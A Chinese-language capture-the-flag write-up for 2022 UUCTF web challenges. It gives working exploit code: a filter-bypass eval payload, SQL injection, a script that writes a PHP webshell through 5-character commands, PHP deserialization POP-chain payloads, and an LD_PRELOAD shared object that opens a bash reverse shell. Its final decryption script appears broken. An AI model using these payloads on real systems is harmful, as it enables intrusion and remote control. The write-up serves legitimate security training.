2022UUCTF–WEB

• 2022 年 11 月 3 日
• 筆記
• CTF--WP

websign

無法右鍵 禁用js後 看源碼

ez_rce — 閉合

源碼，禁用的東西挺多的 仔細發現 ? <> `沒有禁用，閉合標籤反引號執行命令

## 放棄把，小夥子，你真的不會RCE,何必在此糾結呢？？？？？？？？？？？？
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
        echo '看看你輸入的參數！！！不叫樣子！！';echo '<br>';
        eval($code);
    }
    else{
        die("你想幹什麼？？？？？？？？？");
    }
}
else{
    echo "居然都不輸入參數，可惡!!!!!!!!!";
    show_source(__FILE__);
}

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-wkx4nqjg-1667461598333)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221102084645846.png)]

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-L8KGVTDW-1667461598333)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221102084658608.png)]

nl輸出

ezsql — 輸入反向

直接給出了查詢語句

發現輸入 11′)–+ 顯示的是 +–)’11 完全反過來了

首先使用萬能密碼試試

發現即使輸入時正確的帳號密碼也不會回顯flag

找列數 2列

這裡過濾了or 雙寫繞過，查找表名和資料庫名

查列名UUCTF

查內容

ezrce — 6字元RCE

hint：這是一個命令執行介面

我知道咯這是六字元 起初我輸入>nl 回顯命令執行失敗 我以為沒有運行 所以沒寫

所以說不可以完全信回顯

我們要先找到寫文件寫的目錄 echo 一下，文件寫在./tmp/

方法一

>nl
* /*>d

第一個：創建一個叫nl的文件
* /*>d 意思就是 nl /*>f  第一個*就是將ls列出文件名第一個當作命令 其他當作參數

方法二

前置知識

>a 在Linux會創建一個叫a的文件
*>v 會將ls列出的第一個文件名當作命令 其餘當作參數執行
*v>0 等價於 rev v >0 反轉
sh 0 將0文件的內容當作命令執行
ls -th 按照文件的創建時間（後創建先列出）ls -t就可以 這裡加上h是為了按照 sl ht- f\>排列
linux下換行執行命令：
ech\
o\
 111

跑腳本，寫木馬

url="//43.142.108.3:28933/post.php"
print("[+]start attack!!!")
with open("5字元RCE.txt", "r") as f:
    for i in f:
        data = {"cmd": f"{i.strip()}"}
        requests.post(url=url,data=data)

resp = requests.get("//43.142.108.3:28933/tmp/1.php")
if resp.status_code == requests.codes.ok:
    print("[*]Attack success!!!")

    
5字元RCE.txt
>dir
>sl
>ht-
>f\>
*>v
>rev
*v>0
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
sh 0
sh f

ez_unser — 引用繞過wakeup

反序列化 審計程式碼

class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        // 可以看到這裡有一個 $this->b=$this->c; 這裡就是我們利用的地方
        // 這裡說下php引用問題 當a=&b是 a和b分配的是同一快記憶體地址 也就是 a b永遠相等
        $this->b=$this->c;
        // 終點
        eval($this->a);
    }
}
$a=$_GET['a'];
// 這裡限制我們不能修改test後的參數 也就是不可以通過修改參數繞過 __wakeup
if(!preg_match('/test":3/i',$a)){
    die("你輸入的不正確！！！搞什麼！！");
}
$bbb=unserialize($_GET['a']);

構造POC

class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=&$this->b;
        $this->b=2;
        $this->c="system('ls');";
    }
}
echo((serialize(new test())));

最終的payload

<?php
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=&$this->b;
        $this->b=2;
        $this->c="system('cat /f*');";
    }
}


echo((serialize(new test())));

ez_upload–apache解析漏洞

文件上傳也就是哪些方式 一個一個試就好

apache解析漏洞 上傳shell.jpg.php即可

phonecode–mt_rand函數

hint：你能猜到驗證碼嗎? 猜測就是隨機數預判

打開題目 根據提示 意思就是讓我們猜驗證碼是什麼

我們先輸入手機號和驗證碼試試，發現無論請求多少次 hint永遠是895547922，結合mt_srand和mt_rand函數 當設置的種子確定(此處的種子時輸入的手機號)時，每次的mt_rand都是固定的 我們可以猜測hint就是mt_rand的第一次，而目的驗證碼就是mt_rand的第二次

mt_srand(11111);
echo mt_rand(); // 一直是恆定的
echo mt_rand(); // 一直是恆定的
echo mt_rand(); // 一直是恆定的

我們寫程式碼 弄出第二次的mt_rand

mt_srand(123);
echo mt_rand()."\n";  //895547922
echo mt_rand()."\n";  //2141438069

發現果然 第一次的mt_rand就是hint

我們將code改為2141438069

uploadandinject–LD_PRELOAD劫持

打開題目發現有hint

看看hint，意思就是看看swp（Linuxvim產生的文件）.index.php.swp或者看到swp掃描就好

下載 可以看到源碼 使用 vi -r index.php.swp 恢復文件內容

$PATH=$_GET["image_path"];
if((!isset($PATH))){
    $PATH="upload/1.jpg";
}
echo "<div align='center'>";
loadimg($PATH);
echo "</div>";
function loadimg($img_path){
  if(file_exists($img_path)){
      //設置環境變數的值 添加 setting 到伺服器環境變數。 環境變數僅存活於當前請求期間。 在請求結束時環境會恢復到初始狀態 設置.so  LD_PRELOAD設置的優先載入動態鏈接庫 
    putenv("LD_PRELOAD=/var/www/html/$img_path");
    system("echo Success to load");
    echo "<br><img src=$img_path>";
  }else{
    system("echo Failed to load ");
  }
}

而且我們篤定是有上傳的網頁的，限制了文件類型 我們想要上傳的是so，但是LD_PRELOAD也能解析jpg後綴 所以修改後綴上傳就可以

那麼問題又來了 我們上傳了so文件，怎麼才能觸發動態鏈接庫的函數？可以看到下面有一個system函數 ，本地測試可以發現，system會調用/bin/sh

所以我們寫一個exp.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload() {
    //反彈shell
    system("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
}

char *strcpy (char *__restrict __dest, const char *__restrict __src) {
    if (getenv("LD_PRELOAD") == NULL) {
        return 0;
    }
    unsetenv("LD_PRELOAD");
    payload();
}

編譯成so文件 然後修改後綴為jpg

gcc -shared -fPIC exp.c -o exp.so

在upload/upload.php上傳

然後在主頁面訪問，根據源碼我們傳遞upload/exp_shell.jpg給image_path

//設置環境變數的值 添加 setting 到伺服器環境變數。 環境變數僅存活於當前請求期間。 在請求結束時環境會恢復到初始狀態 設置.so  LD_PRELOAD設置的優先載入動態鏈接庫 
putenv("LD_PRELOAD=/var/www/html/$img_path");
// 執行函數 就會優先到我們LD_PRELOAD的指向的函數 反彈shell
system("echo Success to load");

要先在攻擊機上監聽埠

反彈shell成功

輸出flag

ezpop — 字元串逃逸

打開題目給出的就是源碼

//flag in flag.php
error_reporting(0);
class UUCTF{
    public $name,$key,$basedata,$ob;
    function __construct($str){
        $this->name=$str;
    }
    function __wakeup(){
    if($this->key==="UUCTF"){
            $this->ob=unserialize(base64_decode($this->basedata));
        }
        else{
            die("oh!you should learn PHP unserialize String escape!");
        }
    }
}
class output{
    public $a;
    function __toString(){
        $this->a->rce();
    }
}
class nothing{
    public $a;
    public $b;
    public $t;
    function __wakeup(){
        $this->a="";
    }
    function __destruct(){
        $this->b=$this->t;
        die($this->a);
    }
}
class youwant{
    public $cmd;
    function rce(){
        eval($this->cmd);
    }
}
$pdata=$_POST["data"];
if(isset($pdata))
{
    $data=serialize(new UUCTF($pdata));
    $data_replace=str_replace("hacker","loveuu!",$data);
    unserialize($data_replace);
}else{
    highlight_file(__FILE__);
}
?>

考點就是字元串逃逸，剛開始直接序列化UUCTF類，經過替換之後5字元變6字元，我們沒有給$this->key直接賦值但是要求是UUCTF才可以繼續下去，所以通過字元串逃逸間接給key賦值

if($this->key==="UUCTF"){
    $this->ob=unserialize(base64_decode($this->basedata));
}

我們在本地一步一步測試

首先隨便輸入根據輸出構造，測試發現進入了我們的目標

O:5:"UUCTF":4:{s:4:"name";s:"1";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}

O:5:"UUCTF":4:{s:4:"name";s:" ";s:3:"key";s:5:"UUCTF";s:8:"basedata";N;s:2:"ob";N;} ";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}

hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";N;s:2:"ob";N;}

然後構造執行命令的那塊POC

class output{
    public $a;
    function __toString(){
        //1、調用目的函數  __toString 對象實例被當作字元串處理調用
        $this->a->rce();
    }
}
class nothing{
    public $a;
    public $b;
    public $t;
    function __wakeup(){
        $this->a="";
    }
    function __destruct(){
        //2.要繞過__wakeup 但是這裡php版本是7.2.34 不能利用多寫參數繞過 我們還是利用引用繞過
        $this->b=$this->t;
        // 這裡返回的是字元串
        die($this->a);
    }
}
class youwant{
    public $cmd;
    function rce(){
        // 終點
        eval($this->cmd);
    }
}

POC

<?php
class output{
    public $a;
    function __construct(){
        $this->a=new youwant();
    }
}
class nothing{
    public $a;
    public $b;
    public $t;
    function __construct(){
        $this->a=&$this->b;
        $this->b='xx';
        $this->t=new output();
    }
}
class youwant{
    public $cmd;
    function __construct()
    {
        $this->cmd="phpinfo();";
    }
}

echo(base64_encode(serialize(new nothing())));

將上面兩處的構造的結合起來的payload

<?php
class output{
    public $a;
    function __construct(){
        $this->a=new youwant();
    }
}
class nothing{
    public $a;
    public $b;
    public $t;
    function __construct(){
        $this->a=&$this->b;
        $this->b='xx';
        $this->t=new output();
    }
}
class youwant{
    public $cmd;
    function __construct()
    {
        $this->cmd="phpinfo();";
    }
}

$basedata = (base64_encode(serialize(new nothing())));
$str = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';
echo $str."\n";
$hacker='';
for($i=0;$i<strlen($str);$i++)
{
    $hacker.='hacker';
}
$payload = $hacker.$str;
echo $payload;

執行效果

找flag在當前目錄的flag.php

<?php
class output{
    public $a;
    function __construct(){
        $this->a=new youwant();
    }
}
class nothing{
    public $a;
    public $b;
    public $t;
    function __construct(){
        $this->a=&$this->b;
        $this->b='xx';
        $this->t=new output();
    }
}
class youwant{
    public $cmd;
    function __construct()
    {
        $this->cmd="system('cat flag.php');";
    }
}

$basedata = (base64_encode(serialize(new nothing())));
$str = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';
$hacker='';
for($i=0;$i<strlen($str);$i++)
{
    $hacker.='hacker';
}
$payload = $hacker.$str;
echo $payload;

funmd5–對程式碼的理解

打開題目 直接源碼

重點

if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){
    echo "well!you win again!now flag is yours.<br>";
    echo $flag;
}

我們知道$md5[0]==md5($md5[0])繞過可以使用0e215962017，但是還要繞過preg_replace使用%0a，我們審計程式碼發現，後面有對md5[0]的截取 我們只要保證$sub=1從第一位開始截取，就可以避免%0a，而且$sub的值是當前時間的最後一位，也就是保證當前的時間為xxxxxxxx1即可

$sub=substr($time,-1);
$md5[0]=substr($md5[0],$sub);

$guessmd5=md5($time);我們使用腳本快速請求就可以在傳入md5[1]也是當前時間的md5值 兩者就相等

腳本

import hashlib,time,requests

def guess_md5():
    while True:
        url = f"//43.143.7.97:28179/?md5[0]=%0a0e215962017&md5[1]={str(hashlib.md5(str(int(time.time())).encode()).hexdigest())}"
        resp = requests.get(url=url)
        if "win" in resp.text:
            print(resp.text)
            return
        time.sleep(1)

guess_md5()

backdoor–tonyenc加密

這題我不太會哦 沒咋理解 不是很會使用IDA

hint：backdoor.php是一個後門文件

打開題目 說 布里茨 布里茨就是lol的機器人 看robots.txt

下載源碼，發現五個文件大致看下 robots.txt index.php無資訊

看看backdoor.php的程式碼，根據提示 他是一個後門文件 那肯定是有連接後門的密碼的，但是亂碼又不知道

到了這裡屬實是沒啥思路 看wp IDA逆向so文件

so文件是Linux下向當於Windows下的dll文件，Linux下的程式函數庫,即編譯好的可以供其他程式使用的程式碼和數據

發現了tonyenc_encode函數

百度搜索這個是啥：

• 一個簡潔、高性能、跨平台的 PHP7 程式碼加密擴展，當前版本為 0.2.2
• 就是對PHP7的程式碼進行加密的函數

百度搜一下找到git項目

GitHub – lihancong/tonyenc: 高性能、跨平台的 PHP7 程式碼加密擴展 (A high performance and cross-platform encrypt extension for PHP source code)

編譯前請在 core.h 中做如下修改:

/* 這裡訂製你的加密特徵頭，不限長度，十六進位哦 */
const u_char tonyenc_header[] = {
        0x66, 0x88, 0xff, 0x4f,
        0x68, 0x86, 0x00, 0x56,
        0x11, 0x16, 0x16, 0x18,
};

/* 這裡指定密鑰，長一些更安全 */
const u_char tonyenc_key[] = {
        0x9f, 0x49, 0x52, 0x00,
        0x58, 0x9f, 0xff, 0x21,
        0x3e, 0xfe, 0xea, 0xfa,
        0xa6, 0x33, 0xf3, 0xc6,
};

在IDA中找到對應的加密頭和key

根據github源碼寫解密py腳本

import base64
header=[
    0x66, 0x88, 0xff, 0x4f,
    0x68, 0x86, 0x00, 0x56,
    0x11, 0x61, 0x16, 0x18,
]
key=[
    0x9f, 0x58, 0x54, 0x00,
    0x58, 0x9f, 0xff, 0x23,
    0x8e, 0xfe, 0xea, 0xfa,
    0xa6, 0x35, 0xf3, 0xc6]
def decode(data,len):
    p =0
    for i in range(0,len):
        if (i & 1):
            p += key[p] + i;
            p %= 16;
            t = key[p];
            data[i] = ~data[i]^t;
            if data[i] < 0:
                data[i]=data[i]+256
                decode = "".join([chr(c) for c in data])
                return decode
encodefile=open('backdoor.php',"rb")
base64_encodestr=base64.b64encode(encodefile.read())
convert=[c for c in base64.b64decode(base64_encodestr)]
del convert[0:len(header)]
print(str(decode(convert,len(convert))))

解密得到backdoor.php文件內容為

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-gEwEUhZ0-1667461598351)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221103154452619.png)]